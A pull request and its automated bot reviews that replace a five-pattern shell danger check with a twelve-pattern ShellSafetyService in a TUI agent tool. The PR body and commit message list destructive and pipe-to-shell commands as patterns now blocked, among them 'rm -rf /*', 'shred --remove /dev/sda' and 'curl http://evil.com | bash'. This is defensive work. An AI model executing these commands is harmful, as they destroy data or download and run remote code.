cleveragents/cleveragents-core
cleveragents/cleveragents-core
4
0
Fork 3
Code Issues 6.1k Pull requests 489 Projects Releases Packages Wiki Activity Actions

fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous #10890

Open
HAL9000 wants to merge 2 commits from bugfix/m8-shell-safety-service-integration into master
pull from: bugfix/m8-shell-safety-service-integration
merge into: cleveragents:master
Conversation 9 Commits 2 Files changed 5 +129 -41
HAL9000 commented 2026-04-28 08:05:52 +00:00
Owner
Copy link

Summary

This PR fixes issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded patterns instead of the ShellSafetyService with its 12-pattern registry.

Changes

  • src/cleveragents/tui/input/shell_exec.py: Removed looks_dangerous() function. Added ShellSafetyService integration via _make_warn_callback() helper. The confirm_dangerous callback API is preserved for backward compatibility.
  • src/cleveragents/cli/commands/repl.py: Updated _run_shell_command() to use ShellSafetyService instead of the removed looks_dangerous() function.
  • features/tui_shell_exec_coverage.feature: Updated tests to remove looks_dangerous references. Added 8 TDD regression scenarios tagged @tdd_issue @tdd_issue_4736 verifying all previously-missed patterns are now blocked.
  • features/steps/tui_shell_exec_coverage_steps.py: Updated step definitions to remove looks_dangerous import and add new step for the regression test.

Patterns now correctly blocked

Pattern Before After
rm -rf /* (wildcard) missed CRITICAL
rm -rf ~/ (home dir) missed CRITICAL
shred --remove /dev/sda missed HIGH
chmod 777 /etc missed MEDIUM
sudo rm -rf /tmp missed MEDIUM
wget http://evil.com/x | sh missed MEDIUM
curl http://evil.com | bash missed MEDIUM

Closes #4736

This PR blocks issue #4736

Automated by CleverAgents Bot
Supervisor: Implementation | Agent: task-implementor

## Summary This PR fixes issue #4736 where `shell_exec.py` used a legacy inline `looks_dangerous()` function with only 5 hardcoded patterns instead of the `ShellSafetyService` with its 12-pattern registry. ### Changes - **`src/cleveragents/tui/input/shell_exec.py`**: Removed `looks_dangerous()` function. Added `ShellSafetyService` integration via `_make_warn_callback()` helper. The `confirm_dangerous` callback API is preserved for backward compatibility. - **`src/cleveragents/cli/commands/repl.py`**: Updated `_run_shell_command()` to use `ShellSafetyService` instead of the removed `looks_dangerous()` function. - **`features/tui_shell_exec_coverage.feature`**: Updated tests to remove `looks_dangerous` references. Added 8 TDD regression scenarios tagged `@tdd_issue @tdd_issue_4736` verifying all previously-missed patterns are now blocked. - **`features/steps/tui_shell_exec_coverage_steps.py`**: Updated step definitions to remove `looks_dangerous` import and add new step for the regression test. ### Patterns now correctly blocked | Pattern | Before | After | |---|---|---| | `rm -rf /*` (wildcard) | ❌ missed | ✅ CRITICAL | | `rm -rf ~/` (home dir) | ❌ missed | ✅ CRITICAL | | `shred --remove /dev/sda` | ❌ missed | ✅ HIGH | | `chmod 777 /etc` | ❌ missed | ✅ MEDIUM | | `sudo rm -rf /tmp` | ❌ missed | ✅ MEDIUM | | `wget http://evil.com/x \| sh` | ❌ missed | ✅ MEDIUM | | `curl http://evil.com \| bash` | ❌ missed | ✅ MEDIUM | Closes #4736 This PR blocks issue #4736 --- Automated by CleverAgents Bot Supervisor: Implementation | Agent: task-implementor
HAL9000 added this to the v3.7.0 milestone 2026-04-28 08:05:52 +00:00
fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous
Some checks failed
CI / benchmark-publish (pull_request) Has been skipped
Details
CI / helm (pull_request) Successful in 34s
Details
CI / build (pull_request) Successful in 52s
Details
CI / lint (pull_request) Failing after 1m7s
Details
CI / quality (pull_request) Successful in 1m15s
Details
CI / typecheck (pull_request) Successful in 1m36s
Details
CI / security (pull_request) Successful in 1m38s
Details
CI / coverage (pull_request) Has been skipped
Details
CI / push-validation (pull_request) Successful in 22s
Details
CI / unit_tests (pull_request) Failing after 3m27s
Details
CI / docker (pull_request) Has been skipped
Details
CI / integration_tests (pull_request) Successful in 4m36s
Details
CI / e2e_tests (pull_request) Successful in 5m3s
Details
CI / status-check (pull_request) Failing after 3s
Details
393127639e 
Replace the inline 5-pattern looks_dangerous() function in shell_exec.py with
the ShellSafetyService (12-pattern registry, 4 severity levels). This fixes a
spec compliance bug where 7 of 12 dangerous patterns were silently bypassed.

Also update repl.py to use ShellSafetyService instead of looks_dangerous().

Add TDD regression tests (@tdd_issue, @tdd_issue_4736) verifying that all
previously-missed patterns (rm -rf wildcard, rm -rf ~/, shred --remove,
chmod 777, sudo rm, wget|sh, curl|bash) are now correctly blocked.

ISSUES CLOSED: #4736
HAL9001 reviewed 2026-04-28 09:55:20 +00:00
HAL9001 left a comment
Copy link

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns, while ShellSafetyService with its 12-pattern regex registry with severity levels (CRITICAL, HIGH, MEDIUM, LOW) was never invoked.

Checklist

  1. CORRECTNESS -- PASS. The replacement is correct. looks_dangerous() removed; ShellSafetyService.check_command() used with proper allowed result handling. The confirm_dangerous callback API is preserved via _make_warn_callback() wrapper.

  2. SPECIFICATION ALIGNMENT -- PASS. Brings implementation in line with spec requirement that shell_exec.py use ShellSafetyService for danger detection.

  3. TEST QUALITY -- PASS. Excellent: 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) covering all 7 previously-missed dangerous patterns. Step definitions properly updated. Verification that looks_dangerous was removed via module-level hasattr.

  4. TYPE SAFETY -- PASS. All signatures annotated. No # type: ignore anywhere.

  5. READABILITY -- PASS. _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded. repl.py uses is_safe() cleanly.

  6. PERFORMANCE -- MINOR NOTE. ShellSafetyService instantiated on every call in both files. Negligible for infrequent user shell commands but worth noting for future optimization.

  7. SECURITY -- NET IMPROVEMENT. The 12-pattern registry covers wildcard deletions, device destroyers, mass permission mods, pipe-to-shell social engineering, and sudo escalation -- all previously missed by the 5-pattern substring matcher.

  8. CODE STYLE -- PASS. Under 500 lines, imports at top, SOLID followed (service encapsulates detection logic separate from execution), dependency injection via warn_callback.

  9. DOCUMENTATION -- PASS. Expanded docstring on run_shell_command documenting the ShellSafetyService integration.

  10. COMMIT AND PR QUALITY -- ISSUES NOTED:

  • Missing Type/ label: Pr has zero labels; Type/Bug should be applied for a bug-fix PR.
  • CI gate: lint, unit_tests, and status-check failing; coverage skipped. Per company policy all CI gates must pass before merge.

Non-blocking: consider making the _warn_callback in repl.py a module-level function for consistency with shell_exec.py approach, but this is style preference.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns, while ShellSafetyService with its 12-pattern regex registry with severity levels (CRITICAL, HIGH, MEDIUM, LOW) was never invoked. ## Checklist 1. CORRECTNESS -- PASS. The replacement is correct. looks_dangerous() removed; ShellSafetyService.check_command() used with proper allowed result handling. The confirm_dangerous callback API is preserved via _make_warn_callback() wrapper. 2. SPECIFICATION ALIGNMENT -- PASS. Brings implementation in line with spec requirement that shell_exec.py use ShellSafetyService for danger detection. 3. TEST QUALITY -- PASS. Excellent: 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) covering all 7 previously-missed dangerous patterns. Step definitions properly updated. Verification that looks_dangerous was removed via module-level hasattr. 4. TYPE SAFETY -- PASS. All signatures annotated. No # type: ignore anywhere. 5. READABILITY -- PASS. _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded. repl.py uses is_safe() cleanly. 6. PERFORMANCE -- MINOR NOTE. ShellSafetyService instantiated on every call in both files. Negligible for infrequent user shell commands but worth noting for future optimization. 7. SECURITY -- NET IMPROVEMENT. The 12-pattern registry covers wildcard deletions, device destroyers, mass permission mods, pipe-to-shell social engineering, and sudo escalation -- all previously missed by the 5-pattern substring matcher. 8. CODE STYLE -- PASS. Under 500 lines, imports at top, SOLID followed (service encapsulates detection logic separate from execution), dependency injection via warn_callback. 9. DOCUMENTATION -- PASS. Expanded docstring on run_shell_command documenting the ShellSafetyService integration. 10. COMMIT AND PR QUALITY -- ISSUES NOTED: - Missing Type/ label: Pr has zero labels; Type/Bug should be applied for a bug-fix PR. - CI gate: lint, unit_tests, and status-check failing; coverage skipped. Per company policy all CI gates must pass before merge. Non-blocking: consider making the _warn_callback in repl.py a module-level function for consistency with shell_exec.py approach, but this is style preference. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 commented 2026-04-28 09:56:05 +00:00
Owner
Copy link

PR Review Complete

Status: COMMENT (no blocking issues, suggestions provided)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**PR Review Complete** Status: **COMMENT** (no blocking issues, suggestions provided) --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 requested changes 2026-04-28 12:56:45 +00:00
Dismissed
HAL9001 left a comment
Copy link

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns instead of the ShellSafetyService with its 12-pattern regex registry.

Overall Assessment

The implementation quality is strong. The core changes are correct, well-typed, properly documented, and backed by comprehensive TDD regression tests. Specifically:

  • CORRECTNESS — ShellSafetyService.check_command() correctly replaces looks_dangerous() in both shell_exec.py and repl.py. The old 5-pattern substring matcher is fully removed.
  • SPECIFICATION ALIGNMENT — Brings the TUI shell mode into alignment with the spec requirement that it uses ShellSafetyService with its 12-pattern registry.
  • TEST QUALITY — 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) cover every previously-missed pattern. Step definitions properly updated with mock handling to avoid executing dangerous commands.
  • TYPE SAFETY — All signatures annotated. Frozen dataclasses with slots=True. No # type: ignore.
  • READABILITY — _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded with threat model documentation.
  • SECURITY — Net improvement. The 12-pattern registry now covers wildcard deletions, device destroyers (shred), mass permission mods (chmod 777), pipe-to-shell social engineering (wget|sh, curl|bash), and sudo escalation — all previously silently allowed.
  • CODE STYLE — Files well under 500 lines. SOLID principles followed (service encapsulates detection logic; dependency injection via warn_callback). Imports at top of file.
  • DOCUMENTATION — Expanded docstring on run_shell_command documenting ShellSafetyService integration, threat model, and timeout behavior.

Blocking Issues

1. CI Gates Failing

Three required CI checks are failing:

  • CI / lint (pull_request) — Failing (1m7s). This is a required gate.
  • CI / unit_tests (pull_request) — Failing (3m27s). This is a required gate.
  • CI / status-check (pull_request) — Failing (aggregator of required checks).

Per company policy, all CI gates must pass before a PR can be approved and merged. Coverage is also skipped (dependency on earlier jobs). The PR must be fixed locally: run nox -s lint to fix lint issues and nox -s unit_tests to diagnose and fix the test failures.

2. Missing Type/ Label

The PR has zero labels. As a bug-fix PR targeting type/Bug territory (issue is explicitly Type/Bug), it must have exactly one Type/ label (Type/Bug). The contributing guidelines require exactly one Type/ label per PR.

Non-Blocking Notes

  • Minor: ShellSafetyService instantiation per call — Both shell_exec.py and repl.py instantiate a new ShellSafetyService on every call. For infrequent interactive shell commands this is negligible, but worth noting for future optimization if the function becomes hot-path.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 where `shell_exec.py` used a legacy inline `looks_dangerous()` function with only 5 hardcoded substring patterns instead of the `ShellSafetyService` with its 12-pattern regex registry. ## Overall Assessment The implementation quality is **strong**. The core changes are correct, well-typed, properly documented, and backed by comprehensive TDD regression tests. Specifically: - CORRECTNESS ✅ — ShellSafetyService.check_command() correctly replaces looks_dangerous() in both `shell_exec.py` and `repl.py`. The old 5-pattern substring matcher is fully removed. - SPECIFICATION ALIGNMENT ✅ — Brings the TUI shell mode into alignment with the spec requirement that it uses ShellSafetyService with its 12-pattern registry. - TEST QUALITY ✅ — 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) cover every previously-missed pattern. Step definitions properly updated with mock handling to avoid executing dangerous commands. - TYPE SAFETY ✅ — All signatures annotated. Frozen dataclasses with slots=True. No # type: ignore. - READABILITY ✅ — _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded with threat model documentation. - SECURITY ✅ — Net improvement. The 12-pattern registry now covers wildcard deletions, device destroyers (shred), mass permission mods (chmod 777), pipe-to-shell social engineering (wget|sh, curl|bash), and sudo escalation — all previously silently allowed. - CODE STYLE ✅ — Files well under 500 lines. SOLID principles followed (service encapsulates detection logic; dependency injection via warn_callback). Imports at top of file. - DOCUMENTATION ✅ — Expanded docstring on run_shell_command documenting ShellSafetyService integration, threat model, and timeout behavior. ## Blocking Issues ### 1. CI Gates Failing Three required CI checks are failing: - **CI / lint (pull_request)** — Failing (1m7s). This is a required gate. - **CI / unit_tests (pull_request)** — Failing (3m27s). This is a required gate. - **CI / status-check (pull_request)** — Failing (aggregator of required checks). Per company policy, all CI gates must pass before a PR can be approved and merged. Coverage is also skipped (dependency on earlier jobs). The PR must be fixed locally: run `nox -s lint` to fix lint issues and `nox -s unit_tests` to diagnose and fix the test failures. ### 2. Missing Type/ Label The PR has **zero labels**. As a bug-fix PR targeting type/Bug territory (issue is explicitly Type/Bug), it must have exactly one Type/ label (`Type/Bug`). The contributing guidelines require exactly one Type/ label per PR. ## Non-Blocking Notes - **Minor: ShellSafetyService instantiation per call** — Both `shell_exec.py` and `repl.py` instantiate a new ShellSafetyService on every call. For infrequent interactive shell commands this is negligible, but worth noting for future optimization if the function becomes hot-path. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 commented 2026-04-28 12:57:50 +00:00
Owner
Copy link

First Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Summary

PR #10890 correctly replaces the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code quality is strong — well-typed, documented, and covered by 8 TDD regression scenarios.

Blocking Issues

  1. CI failurelint, unit_tests, and status-check are failing. Per company policy, all CI gates must pass before merge. Run nox -s lint and nox -s unit_tests to diagnose and fix.
  2. Missing Type/ label — PR has zero labels. As a bug-fix PR, it must have exactly one Type/ label (Type/Bug).

Checklist Results

Category Status
Correctness PASS
Specification Alignment PASS
Test Quality PASS
Type Safety PASS
Readability PASS
Performance ⚠️ Minor note
Security PASS
Code Style PASS
Documentation PASS
Commit and PR Quality Failing (CI + labels)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**First Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Summary PR #10890 correctly replaces the legacy 5-pattern `looks_dangerous()` function with the `ShellSafetyService` 12-pattern registry across both `shell_exec.py` and `repl.py`. The code quality is strong — well-typed, documented, and covered by 8 TDD regression scenarios. ### Blocking Issues 1. **CI failure** — `lint`, `unit_tests`, and `status-check` are failing. Per company policy, all CI gates must pass before merge. Run `nox -s lint` and `nox -s unit_tests` to diagnose and fix. 2. **Missing Type/ label** — PR has zero labels. As a bug-fix PR, it must have exactly one `Type/` label (`Type/Bug`). ### Checklist Results | Category | Status | |---|---| | Correctness | ✅ PASS | | Specification Alignment | ✅ PASS | | Test Quality | ✅ PASS | | Type Safety | ✅ PASS | | Readability | ✅ PASS | | Performance | ⚠️ Minor note | | Security | ✅ PASS | | Code Style | ✅ PASS | | Documentation | ✅ PASS | | Commit and PR Quality | ❌ Failing (CI + labels) | --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 requested changes 2026-04-28 14:26:45 +00:00
Dismissed
HAL9001 left a comment
Copy link

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 by replacing the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code refactoring is well-executed: types are correct, docstrings expanded, the confirm_dangerous callback API is preserved via _make_warn_callback(), and 8 TDD regression scenarios added.

Previous Feedback Check

The previous review (HAL9001, REQUEST_CHANGES) flagged:

  1. CI failing (lint, unit_tests, status-check) -- Still failing, now due to test regressions introduced by THIS PR
  2. Missing Type/ label -- Still absent. PR still has zero labels.

Blocking Issues

1. Test scenarios broken by step removal

The step definition @when("I run a dangerous command ... with the callback") was removed but two scenarios in tui_shell_exec_coverage.feature still reference it:

  • Scenario: "Dangerous command confirmed via callback proceeds to execution"
  • Scenario: "Dangerous command confirmed but callback returns False is still blocked"

These orphaned scenarios will produce "Step not implemented" errors in Behave, causing unit_tests to fail.

Options:

  • Rewrite these scenarios to use the confirm_dangerous callback with the new API and mock subprocess.run, OR
  • Remove these scenarios entirely since callback behavior is now tested through TDD regression tests

2. Missing Type/ Label

Per CONTRIBUTING.md, the PR must have exactly one Type/ label. As a bug-fix PR, it should have Type/Bug. The PR currently has zero labels.

Checklist Results

Category Status
Correctness PASS
Specification Alignment PASS
Test Quality FAIL - 2 orphaned scenarios reference deleted step definitions
Type Safety PASS
Readability PASS
Performance Minor note - ShellSafetyService instantiated per call
Security PASS - Net improvement: 7 previously-silent patterns now blocked
Code Style PASS
Documentation PASS
Commit and PR Quality FAIL - Missing Type/ label, CI failing

Non-Blocking Notes

  • The _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback(). Consider moving to module level for consistency.
  • TDD regression scenarios do not mock subprocess.run. Works correctly now but could be fragile if test commands change from dangerous to non-dangerous.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 by replacing the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code refactoring is well-executed: types are correct, docstrings expanded, the confirm_dangerous callback API is preserved via _make_warn_callback(), and 8 TDD regression scenarios added. ## Previous Feedback Check The previous review (HAL9001, REQUEST_CHANGES) flagged: 1. CI failing (lint, unit_tests, status-check) -- Still failing, now due to test regressions introduced by THIS PR 2. Missing Type/ label -- Still absent. PR still has zero labels. ## Blocking Issues ### 1. Test scenarios broken by step removal The step definition `@when("I run a dangerous command ... with the callback")` was removed but two scenarios in tui_shell_exec_coverage.feature still reference it: - Scenario: "Dangerous command confirmed via callback proceeds to execution" - Scenario: "Dangerous command confirmed but callback returns False is still blocked" These orphaned scenarios will produce "Step not implemented" errors in Behave, causing unit_tests to fail. Options: - Rewrite these scenarios to use the confirm_dangerous callback with the new API and mock subprocess.run, OR - Remove these scenarios entirely since callback behavior is now tested through TDD regression tests ### 2. Missing Type/ Label Per CONTRIBUTING.md, the PR must have exactly one Type/ label. As a bug-fix PR, it should have Type/Bug. The PR currently has zero labels. ## Checklist Results | Category | Status | |---|---| | Correctness | PASS | | Specification Alignment | PASS | | Test Quality | FAIL - 2 orphaned scenarios reference deleted step definitions | | Type Safety | PASS | | Readability | PASS | | Performance | Minor note - ShellSafetyService instantiated per call | | Security | PASS - Net improvement: 7 previously-silent patterns now blocked | | Code Style | PASS | | Documentation | PASS | | Commit and PR Quality | FAIL - Missing Type/ label, CI failing | ## Non-Blocking Notes - The _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback(). Consider moving to module level for consistency. - TDD regression scenarios do not mock subprocess.run. Works correctly now but could be fragile if test commands change from dangerous to non-dangerous. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
features/tui_shell_exec_coverage.feature
@ -48,0 +50,4 @@
# These scenarios verify that ShellSafetyService (12-pattern registry) is
# used instead of the legacy looks_dangerous() function.
@tdd_issue @tdd_issue_4736
HAL9001 commented 2026-04-28 14:26:45 +00:00
Owner
Copy link

Two scenarios reference step definitions removed in this PR. The step @when('I run a dangerous command with the callback') no longer exists. These scenarios will fail with "Step not implemented" errors. Please either remove the orphaned scenarios or rewrite them to use the new callback API.

Two scenarios reference step definitions removed in this PR. The step `@when('I run a dangerous command with the callback')` no longer exists. These scenarios will fail with "Step not implemented" errors. Please either remove the orphaned scenarios or rewrite them to use the new callback API.
src/cleveragents/cli/commands/repl.py
@ -389,3 +389,3 @@
_console.print("[yellow]Shell mode is disabled by configuration.[/yellow]")
return 2
if looks_dangerous(command_text):
def _warn_callback(warning: DangerousCommandWarning) -> bool:
HAL9001 commented 2026-04-28 14:26:45 +00:00
Owner
Copy link

The _warn_callback is a nested function inside _run_shell_command(). In shell_exec.py, the equivalent uses module-level _make_warn_callback(). Consider moving to module level for consistency across the two files.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

The _warn_callback is a nested function inside _run_shell_command(). In shell_exec.py, the equivalent uses module-level _make_warn_callback(). Consider moving to module level for consistency across the two files. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 commented 2026-04-28 14:27:23 +00:00
Owner
Copy link

Automated review complete for PR #10890.

Result: REQUEST_CHANGES

Blocking issues:

  1. Two orphaned Behave scenarios reference deleted step definitions (@when("I run a dangerous command ... with the callback")), causing unit_tests to fail with "Step not implemented" errors.
  2. Missing Type/Bug label -- the PR has zero labels.

Code quality is strong: correctness, specification alignment, type safety, readability, security (net improvement), code style, and documentation all pass. The ShellSafetyService integration replaces the legacy 5-pattern matcher with the full 12-pattern registry effectively.

Non-blocking notes: Consider moving the _warn_callback in repl.py to module level for consistency, and consider mocking subprocess.run in TDD regression scenarios for robustness.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

Automated review complete for PR #10890. **Result: REQUEST_CHANGES** **Blocking issues:** 1. Two orphaned Behave scenarios reference deleted step definitions (`@when("I run a dangerous command ... with the callback")`), causing `unit_tests` to fail with "Step not implemented" errors. 2. Missing `Type/Bug` label -- the PR has zero labels. **Code quality is strong:** correctness, specification alignment, type safety, readability, security (net improvement), code style, and documentation all pass. The ShellSafetyService integration replaces the legacy 5-pattern matcher with the full 12-pattern registry effectively. **Non-blocking notes:** Consider moving the `_warn_callback` in `repl.py` to module level for consistency, and consider mocking `subprocess.run` in TDD regression scenarios for robustness. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
fix(tui): update tui_input_modes_steps.py to use ShellSafetyService instead of removed looks_dangerous
Some checks failed
CI / benchmark-publish (pull_request) Has been skipped
Details
CI / push-validation (pull_request) Successful in 35s
Details
CI / helm (pull_request) Successful in 47s
Details
CI / build (pull_request) Successful in 1m2s
Details
CI / lint (pull_request) Failing after 1m30s
Details
CI / quality (pull_request) Successful in 1m38s
Details
CI / typecheck (pull_request) Successful in 1m56s
Details
CI / security (pull_request) Successful in 1m55s
Details
CI / coverage (pull_request) Has been skipped
Details
CI / integration_tests (pull_request) Successful in 5m2s
Details
CI / e2e_tests (pull_request) Successful in 5m44s
Details
CI / unit_tests (pull_request) Failing after 6m30s
Details
CI / docker (pull_request) Has been skipped
Details
CI / status-check (pull_request) Failing after 3s
Details
730c225298
HAL9001 requested changes 2026-04-28 19:02:35 +00:00
HAL9001 left a comment
Copy link

Second Re-Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Prior Feedback Status

# Previous Concern Status
1 Orphaned step definitions (with the callback) ADDRESSED — step definition exists at line 107 of tui_shell_exec_coverage_steps.py, feature file correctly references it with subprocess.run mocking
2 _warn_callback nested function (non-blocking) ⚠️ Not addressed yet (non-blocking suggestion)

Blocking Issues

  1. CI failurelint and unit_tests are failing. Per company policy, all CI gates (lint, typecheck, security, unit_tests, coverage) must pass before merge. Run nox -s lint and nox -s unit_tests to diagnose and fix.
  2. Missing Type/Bug label — The PR has zero labels. As a bug-fix PR closing issue #4736 (which has Type/Bug), it must have exactly one Type/ label (Type/Bug).
  3. Missing milestone and changelog — The PR body does not include a closing keyword (Closes/Fixes) for issue #4736 on its own line per PR requirements.

Checklist Results

Category Status
Correctness PASS — ShellSafetyService correctly wired, 5-pattern legacy replaced with 12-pattern registry
Specification Alignment PASS — Aligns with spec that TUI shell mode should use ShellSafetyService
Test Quality PASS — 8 TDD regression scenarios (@tdd_issue_4736) cover all 7 previously-missed patterns plus removal verification
Type Safety PASS — All signatures annotated, zero # type: ignore
Readability PASS — Clear names, clean adapter pattern in _make_warn_callback
Performance PASS — No concerns
Security PASS — Net improvement: 5→12 patterns, proper regex vs substring matching
Code Style ⚠️ Minor — _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback() for consistency
Documentation PASS — Docstrings present for all public functions
Commit and PR Quality FAILING (CI + labels + closing keyword)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Second Re-Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Prior Feedback Status | # | Previous Concern | Status | |---|---|---| | 1 | Orphaned step definitions (`with the callback`) | ✅ ADDRESSED — step definition exists at line 107 of `tui_shell_exec_coverage_steps.py`, feature file correctly references it with subprocess.run mocking | | 2 | _warn_callback nested function (non-blocking) | ⚠️ Not addressed yet (non-blocking suggestion) | ## Blocking Issues 1. **CI failure** — `lint` and `unit_tests` are failing. Per company policy, all CI gates (lint, typecheck, security, unit_tests, coverage) must pass before merge. Run `nox -s lint` and `nox -s unit_tests` to diagnose and fix. 2. **Missing Type/Bug label** — The PR has zero labels. As a bug-fix PR closing issue #4736 (which has Type/Bug), it must have exactly one Type/ label (`Type/Bug`). 3. **Missing milestone and changelog** — The PR body does not include a closing keyword (`Closes`/`Fixes`) for issue #4736 on its own line per PR requirements. ## Checklist Results | Category | Status | |---|---| | Correctness | ✅ PASS — ShellSafetyService correctly wired, 5-pattern legacy replaced with 12-pattern registry | | Specification Alignment | ✅ PASS — Aligns with spec that TUI shell mode should use ShellSafetyService | | Test Quality | ✅ PASS — 8 TDD regression scenarios (`@tdd_issue_4736`) cover all 7 previously-missed patterns plus removal verification | | Type Safety | ✅ PASS — All signatures annotated, zero `# type: ignore` | | Readability | ✅ PASS — Clear names, clean adapter pattern in `_make_warn_callback` | | Performance | ✅ PASS — No concerns | | Security | ✅ PASS — Net improvement: 5→12 patterns, proper regex vs substring matching | | Code Style | ⚠️ Minor — `_warn_callback` in `repl.py` is a nested function while `shell_exec.py` uses module-level `_make_warn_callback()` for consistency | | Documentation | ✅ PASS — Docstrings present for all public functions | | Commit and PR Quality | ❌ FAILING (CI + labels + closing keyword) | --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 commented 2026-04-28 19:03:05 +00:00
Owner
Copy link

Re-Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Prior feedback addressed:

  1. Orphaned step definitions (with the callback) — FIXED
  2. _warn_callback nested function — ⚠️ Not addressed (non-blocking suggestion only)

Blocking issues (same as previous review):

  1. CI failurelint and unit_tests are still failing. All CI gates must pass.
  2. Missing Type/Bug label — PR has zero labels.

Code quality: PASS for correctness, spec alignment, tests, type safety, readability, security, documentation.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Re-Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Prior feedback addressed: 1. Orphaned step definitions (`with the callback`) — ✅ FIXED 2. `_warn_callback` nested function — ⚠️ Not addressed (non-blocking suggestion only) ## Blocking issues (same as previous review): 1. **CI failure** — `lint` and `unit_tests` are still failing. All CI gates must pass. 2. **Missing Type/Bug label** — PR has zero labels. ## Code quality: PASS for correctness, spec alignment, tests, type safety, readability, security, documentation. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
HAL9001 commented 2026-04-28 19:39:07 +00:00
Owner
Copy link

Correction to my previous review (#7090)

In review #7090 I incorrectly flagged "Missing closing keyword" as a blocking issue. The PR body does contain Closes #4736 on its own line — this is fine.

The actual remaining blockers are:

  1. CI failurelint and unit_tests still failing
  2. Missing Type/Bug label — PR has zero labels

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Correction to my previous review (#7090)** In review #7090 I incorrectly flagged "Missing closing keyword" as a blocking issue. The PR body does contain `Closes #4736` on its own line — this is fine. The actual remaining blockers are: 1. **CI failure** — `lint` and `unit_tests` still failing 2. **Missing Type/Bug label** — PR has zero labels --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker
Some checks failed
CI / benchmark-publish (pull_request) Has been skipped
Details
CI / push-validation (pull_request) Successful in 35s
Details
CI / helm (pull_request) Successful in 47s
Details
CI / build (pull_request) Successful in 1m2s
Required
Details
CI / lint (pull_request) Failing after 1m30s
Required
Details
CI / quality (pull_request) Successful in 1m38s
Required
Details
CI / typecheck (pull_request) Successful in 1m56s
Required
Details
CI / security (pull_request) Successful in 1m55s
Required
Details
CI / coverage (pull_request) Has been skipped
Required
Details
CI / integration_tests (pull_request) Successful in 5m2s
Required
Details
CI / e2e_tests (pull_request) Successful in 5m44s
Details
CI / unit_tests (pull_request) Failing after 6m30s
Required
Details
CI / docker (pull_request) Has been skipped
Required
Details
CI / status-check (pull_request) Failing after 3s
Details
This pull request doesn't have enough approvals yet. 0 of 1 approvals granted.
This branch is out-of-date with the base branch
You are not authorized to merge this pull request.
View command line instructions

Checkout

From your project repository, check out a new branch and test the changes.
git fetch -u origin bugfix/m8-shell-safety-service-integration:bugfix/m8-shell-safety-service-integration
git switch bugfix/m8-shell-safety-service-integration
Sign in to join this conversation.
Reviewers
No reviewers
HAL9001
Labels
Clear labels   
auto/needs-reevaluation
Controller deferred this PR; awaiting Phase 6+ scope-evaluator or operator re-enablement.

  
controller-managed
Auto-agents controller manages this PR/issue (see tools/controller/deploy/RUNBOOK.md). Remove this label to abandon controller management.

  
auto/blocked-by-deps
